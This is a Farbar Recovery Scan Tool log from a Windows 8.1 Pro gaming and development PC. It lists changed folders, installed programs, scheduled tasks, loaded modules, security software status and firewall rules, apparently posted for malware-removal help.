2016-07-08 14:45 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\SysWOW64\WCN
2016-07-08 14:45 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\SysWOW64\slmgr
2016-07-08 14:45 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\SysWOW64\Printing_Admin_Scripts
2016-07-08 14:45 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\system32\winrm
2016-07-08 14:45 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\system32\slmgr
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ___RD C:\Windows\ImmersiveControlPanel
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\WinStore
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\SysWOW64\MUI
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\SysWOW64\Com
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\system32\migwiz
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\PolicyDefinitions
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\IME
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files\Windows Defender
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files\Common Files\System
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2016-07-08 14:45 - 2013-08-22 16:36 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2016-07-08 14:45 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\SysWOW64\oobe
2016-07-08 14:45 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\SysWOW64\Dism
2016-07-08 14:45 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\system32\Sysprep
2016-07-08 14:45 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\system32\oobe
2016-07-08 14:44 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\system32\WCN
2016-07-08 14:44 - 2014-11-21 07:54 - 00000000 ____D C:\Windows\system32\Printing_Admin_Scripts
2016-07-08 14:44 - 2013-08-22 16:36 - 00000000 ___SD C:\Windows\system32\dsc
2016-07-08 14:44 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\system32\SystemResetPlatform
2016-07-08 14:44 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\system32\MUI
2016-07-08 14:44 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\system32\Com
2016-07-08 14:44 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\system32\Dism
2016-07-04 13:47 - 2013-08-22 16:20 - 00000000 ____D C:\Windows\CbsTemp
2016-07-04 12:29 - 2016-06-15 17:54 - 00000000 ____D C:\Program Files (x86)\Steam
2016-07-02 19:31 - 2016-06-15 15:39 - 00000000 ____D C:\Users\User not found
2016-07-02 15:52 - 2016-06-15 16:57 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-07-02 14:23 - 2014-12-30 18:48 - 00000000 ____D C:\Program Files (x86)\MSBuild
2016-06-27 17:22 - 2013-08-22 15:44 - 05096392 _____ C:\Windows\system32\FNTCACHE.DAT
2016-06-25 18:18 - 2016-06-15 18:05 - 00001760 _____ C:\Users\User not found\Desktop\MPC-HC x64.lnk
2016-06-23 19:34 - 2016-06-15 18:12 - 00000000 ____D C:\Users\User not found\AppData\Local\Adobe
2016-06-21 18:50 - 2016-06-15 18:32 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Sony
2016-06-21 14:46 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\AppCompat
2016-06-20 16:29 - 2016-06-15 16:54 - 00000000 __SHD C:\Users\User not found\AppData\Local\EmieUserList
2016-06-20 16:29 - 2016-06-15 16:54 - 00000000 __SHD C:\Users\User not found\AppData\Local\EmieSiteList
2016-06-20 16:28 - 2016-06-15 16:54 - 00000000 __SHD C:\Users\User not found\AppData\LocalLow\EmieUserList
2016-06-20 16:28 - 2016-06-15 16:53 - 00000000 __SHD C:\Users\User not found\AppData\LocalLow\EmieSiteList
2016-06-20 14:22 - 2014-11-21 16:14 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-06-20 14:22 - 2013-08-22 14:36 - 00000000 ____D C:\Windows\system32\AdvancedInstallers
2016-06-20 14:21 - 2013-08-22 16:36 - 00000000 ___RD C:\Windows\ToastData
2016-06-16 19:41 - 2016-06-15 17:57 - 00003192 _____ C:\Windows\System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-2876588207-1483049806-666444280-1002
2016-06-16 16:48 - 2016-06-15 15:39 - 00000000 ____D C:\Users\User not found\AppData\Local\Packages
2016-06-16 16:47 - 2013-08-22 16:36 - 00000000 ____D C:\Windows\AppReadiness
2016-06-16 00:20 - 2013-08-22 16:36 - 00262144 _____ C:\Windows\system32\config\BCD-Template

==================== Files in the root of some directories =======

2016-06-21 17:06 - 2016-07-02 21:13 - 0000132 _____ () C:\Users\User not found\AppData\Roaming\Adobe PNG Format CS6 Prefs
2016-07-13 19:56 - 2016-07-13 20:06 - 0047595 _____ () C:\Users\User not found\AppData\Roaming\ICARE.LOG

Some files in TEMP:
====================
C:\Users\User not found\AppData\Local\Temp\xmlUpdater.exe


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2016-07-12 15:42

==================== End of FRST.txt ============================

 

 

 

 

 

 

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16-07-2016
Ran by User not found (2016-07-16 14:21:47)
Running from C:\Users\User not found\Downloads
Windows 8.1 Pro (Update) (X64) (2016-06-15 14:39:02)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrador (S-1-5-21-2876588207-1483049806-666444280-500 - Administrator - Disabled)
Convidado (S-1-5-21-2876588207-1483049806-666444280-501 - Limited - Disabled)
User not found (S-1-5-21-2876588207-1483049806-666444280-1002 - Administrator - Enabled) => C:\Users\User not found

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Active Directory Authentication Library for SQL Server (Version: 13.0.1601.5 - Microsoft Corporation) Hidden
Active Directory Authentication Library for SQL Server (x86) (x32 Version: 13.0.1601.5 - Microsoft Corporation) Hidden
Actualizações da NVIDIA 2.11.4.0 (Version: 2.11.4.0 - NVIDIA Corporation) Hidden
Adobe Flash Player 22 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 22.0.0.209 - Adobe Systems Incorporated)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 12.1.2272 - AVAST Software)
Battlefield 3™ (HKLM-x32\...\{76285C16-411A-488A-BCE3-C83CB933D8CF}) (Version: 1.6.0.0 - Electronic Arts)
Battlelog Web Plugins (HKLM-x32\...\Battlelog Web Plugins) (Version: 2.7.1 - EA Digital Illusions CE AB)
Counter-Strike: Global Offensive (HKLM\...\Steam App 730) (Version:  - Valve)
IIS 10.0 Express (HKLM\...\{13FD7E30-D2F1-498D-ABC2-A4242DB6610E}) (Version: 10.0.1736 - Microsoft Corporation)
IIS Express Application Compatibility Database for x64 (HKLM\...\{08274920-8908-45c2-9258-8ad67ff77b09}.sdb) (Version:  - )
IIS Express Application Compatibility Database for x86 (HKLM\...\{ad846bae-d44b-4722-abad-f7420e08bcd9}.sdb) (Version:  - )
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.4276 - Intel Corporation)
Kit de développement logiciel (SDK) Microsoft .NET Framework 4.6.1 (Français) (HKLM-x32\...\{9369E1F2-44C9-4864-843E-159725E660CB}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 SDK (HKLM-x32\...\{2F0ECC80-B9E4-4485-8083-CD32F22ABD92}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (ENU) (HKLM-x32\...\{8EEB28EE-5141-411C-9CF0-9952264FE4AF}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (HKLM-x32\...\{8BC3EEC9-090F-4C53-A8DA-1BEC913040F9}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 Targeting Pack (Français) (HKLM-x32\...\{AD054CB0-F527-48AD-832B-E65D46237C88}) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Help Viewer 2.2 (HKLM-x32\...\Microsoft Help Viewer 2.2) (Version: 2.2.25420 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2876588207-1483049806-666444280-1002\...\OneDriveSetup.exe) (Version: 17.3.6390.0509 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20513.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Command Line Utilities  (HKLM\...\{9D573E71-1077-4C7E-B4DB-4E22A5D2B48B}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{49D665A2-4C2A-476E-9AB8-FCC425F526FC}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2014 Express LocalDB  (HKLM\...\{AB8DE9BA-19E1-446A-BCFA-6B3DA9751E21}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (HKLM-x32\...\{2774595F-BC2A-4B12-A25B-0C37A37049B0}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Management Objects  (x64) (HKLM\...\{1F9EB3B6-AED7-4AA7-B8F1-8E314B74B2A5}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 Transact-SQL ScriptDom  (HKLM\...\{020CDFE0-C127-4047-B571-37C82396B662}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2014 T-SQL Language Service  (HKLM-x32\...\{47D08E7A-92A1-489B-B0BF-415516497BCE}) (Version: 12.0.2000.8 - Microsoft Corporation)
Microsoft SQL Server 2016 LocalDB  (HKLM\...\{E359515A-92E6-4FA3-A2C9-E1BA02D8DE6E}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 Management Objects  (HKLM-x32\...\{0F1C8E2F-199A-4946-B3BF-0906DACFD032}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 Management Objects  (x64) (HKLM\...\{20EA85AA-2A1D-4F11-B09F-4BA2BF3C8989}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server 2016 T-SQL Language Service  (HKLM-x32\...\{8BFDE775-C5B8-46DB-84EF-43FFC8A2E8AD}) (Version: 13.0.14500.10 - Microsoft Corporation)
Microsoft SQL Server 2016 T-SQL ScriptDom  (HKLM\...\{D091DE8C-EA0F-49AF-8DE3-BD6C79737C6E}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft SQL Server Compact 4.0 SP1 x64 ENU (HKLM\...\{78909610-D229-459C-A936-25D92283D3FD}) (Version: 4.0.8876.1 - Microsoft Corporation)
Microsoft SQL Server Data Tools - enu (14.0.60519.0) (HKLM-x32\...\{4E27B0EF-7BAB-432A-AF3D-3FC8F3F7353F}) (Version: 14.0.60519.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM\...\{68BA34E8-9B9D-4A74-83F0-7D366B532D75}) (Version: 12.0.2402.11 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM\...\{FC3BB979-AA54-4B60-BBA3-2C4DA6E08D80}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM-x32\...\{091CE6AA-2753-4F6E-AD1C-0E875744EB54}) (Version: 12.0.2402.29 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2014 (HKLM-x32\...\{718FFB65-F6E4-4D62-861F-ED10ED32C936}) (Version: 12.0.2402.11 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2016 (HKLM\...\{96EB5054-C775-4BEF-B7B9-AA96A295EDCD}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2016 (HKLM-x32\...\{84C23ECA-FE4D-494F-9247-3EBAD57E7F0C}) (Version: 13.0.1601.5 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24210 (HKLM-x32\...\{f144e08f-9cbe-4f09-9a8c-f2b858b7ee7f}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24210 (HKLM-x32\...\{23658c02-145e-483d-ba6b-1eb82c580529}) (Version: 14.0.24210.0 - Microsoft Corporation)
Microsoft Web Deploy 3.6 (HKLM\...\{94E1227C-08A9-4962-B388-1F05D89AEA75}) (Version: 3.1238.1962 - Microsoft Corporation)
Mozilla Firefox 47.0.1 (x86 pt-PT) (HKLM-x32\...\Mozilla Firefox 47.0.1 (x86 pt-PT)) (Version: 47.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 47.0.1.6018 - Mozilla)
MPC-HC 1.7.10 (64-bit) (HKLM\...\{2ACBF1FA-F5C3-4B19-A774-B22A31F231B9}_is1) (Version: 1.7.10 - MPC-HC Team)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.9.2 - Notepad++ Team)
NVIDIA Controlador gráfico 368.69 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 368.69 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.11.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.4.0 - NVIDIA Corporation)
NVIDIA O controlador de HD Audio 1.3.34.15 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.15 - NVIDIA Corporation)
NVIDIA O software do sistema PhysX 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
Origin (HKLM-x32\...\Origin) (Version: 9.12.1.43352 - Electronic Arts, Inc.)
Painel de controlo da NVIDIA 368.69 (Version: 368.69 - NVIDIA Corporation) Hidden
Prerequisites for SSDT  (HKLM-x32\...\{21373064-AD95-48DB-A32E-0D9E08EF7355}) (Version: 12.0.2000.8 - Microsoft Corporation)
Prerequisites for SSDT  (HKLM-x32\...\{B7E94916-7AE6-4F7F-A377-7A410A42BA19}) (Version: 13.0.1601.5 - Microsoft Corporation)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.991 - Even Balance, Inc.)
SafeZone Stable 1.48.2066.114 (x32 Version: 1.48.2066.114 - Avast Software) Hidden
SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.11.4.0 - NVIDIA Corporation) Hidden
Skype™ 7.25 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.25.106 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.0.19 - TeamSpeak Systems GmbH)
Vulkan Run Time Libraries 1.0.11.1 (HKLM\...\VulkanRT1.0.11.1) (Version: 1.0.11.1 - LunarG, Inc.)
WinRAR 5.31 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2876588207-1483049806-666444280-1002_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\User not found\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\amd64\FileCoAuthLib64.dll ()
CustomCLSID: HKU\S-1-5-21-2876588207-1483049806-666444280-1002_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\User not found\AppData\Local\Microsoft\OneDrive\17.3.6390.0509\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-2876588207-1483049806-666444280-1002_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\Windows\system32\igfxEM.exe (Intel Corporation)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {050F2B79-9879-4C6C-9791-9A59F8BA9F0E} - System32\Tasks\Microsoft\VisualStudio\VSIX Auto Update 14 => C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\IDE\VSIXAutoUpdate.exe
Task: {2B46C540-13C7-4223-A9E8-B151AEC07320} - System32\Tasks\SafeZone scheduled Autoupdate 1468434428 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2016-06-17] (Avast Software)
Task: {5E81E37A-2B8B-4582-B31A-19A2600373BF} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-07-12] (Adobe Systems Incorporated)
Task: {60124AD6-BB12-49B0-9EFD-D3E89CB9B4F9} - \Optimize Start Menu Cache Files-S-1-5-21-2194052053-610074514-4291411958-1001 -> No File <==== ATTENTION
Task: {844F311A-7390-4A90-8840-366EB7ACAE34} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-07-13] (AVAST Software)
Task: {DE63146F-5DE7-4D7E-BE64-D85FD5BFAE63} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2016-07-13] (AVAST Software)
Task: {E6FE1A8C-196C-49EC-AFE7-28CEB3322CC1} - System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-2876588207-1483049806-666444280-1002 => C:\Users\User not found\AppData\Local\Microsoft\OneDrive\OneDrive.exe [2016-06-16] (Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

==================== Loaded Modules (Whitelisted) ==============

2016-07-11 18:14 - 2016-06-29 19:37 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 00367552 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 00288192 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\libprotobuf.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 03611584 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll
2016-06-23 21:21 - 2016-06-23 21:38 - 00075136 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2016-07-11 18:15 - 2016-06-29 23:44 - 01988544 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvPortForwardPlugin.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 02665920 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvMdnsPlugin.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 01840576 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\RtspPlugin.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 00207296 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\RtspServer.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 00034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 00920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll
2016-07-13 19:24 - 2016-07-13 19:24 - 00146232 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-07-16 12:43 - 2016-07-16 12:43 - 03000832 _____ () C:\Program Files\AVAST Software\Avast\defs\16071600\algo.dll
2016-07-13 19:24 - 2016-07-13 19:24 - 00479288 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2016-07-11 18:15 - 2016-06-29 23:44 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2016-07-13 19:24 - 2016-07-13 19:24 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)


==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 14:25 - 2013-08-22 14:25 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-2876588207-1483049806-666444280-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\User not found\Desktop\ktm_990_super_duke-1920x1080.jpg
DNS Servers: 8.8.8.8 - 8.8.4.4
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
HKU\S-1-5-21-2876588207-1483049806-666444280-1002\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-2876588207-1483049806-666444280-1002\...\StartupApproved\Run: => "Steam"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{E37E6571-9825-4325-B6B7-2AB99CCDB955}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{4F08C9F2-CC01-4139-BE9D-CF2CDFEA42ED}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{0298D77C-C35B-4C87-BE10-7585B2899A71}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{02CD9553-153A-46AA-8491-D978D7B79E40}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{C38EDE32-01C9-4161-9CFF-B782E96FF5E9}] => (Allow) C:\Users\User not found\AppData\Local\Microsoft\OneDrive\OneDrive.exe
FirewallRules: [{0A2240BB-D446-45FE-89BC-3115B09887DC}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{F044EFC4-F243-46EB-BF30-ACCF9134E575}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{EA4F1002-5D19-435B-BD25-46F3B8A3CE37}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{650D0A2F-D805-462D-8ACB-1390A909D387}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{EA49333A-ADA2-4AEA-8A2F-1D18D9AC2E38}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{4743703C-2692-495C-B384-479E84A8F05A}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{4FB6491A-4506-4E08-B15C-5DF53E582A0B}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{0CDAC64E-3D63-4D01-84CA-F68229F571A2}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{2186CDBA-F2FF-403E-B0DA-6C10165B6F71}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{F370ADF2-FA62-4B98-90E7-B3AB1F4BD746}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{98431B85-8EBF-49EE-9C51-B8EF7231D9C3}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 3\bf3.exe
FirewallRules: [{61EAC859-1A43-4545-9207-37144D3CBE92}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 3\bf3.exe
FirewallRules: [{C9783186-8C34-4E33-9B1D-CCB63C134E54}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{CBEA8C58-5503-421B-BD4D-761814CF609E}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{A9E5CBF0-E0EA-4EB7-A3B8-E21D0EFB4FE2}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
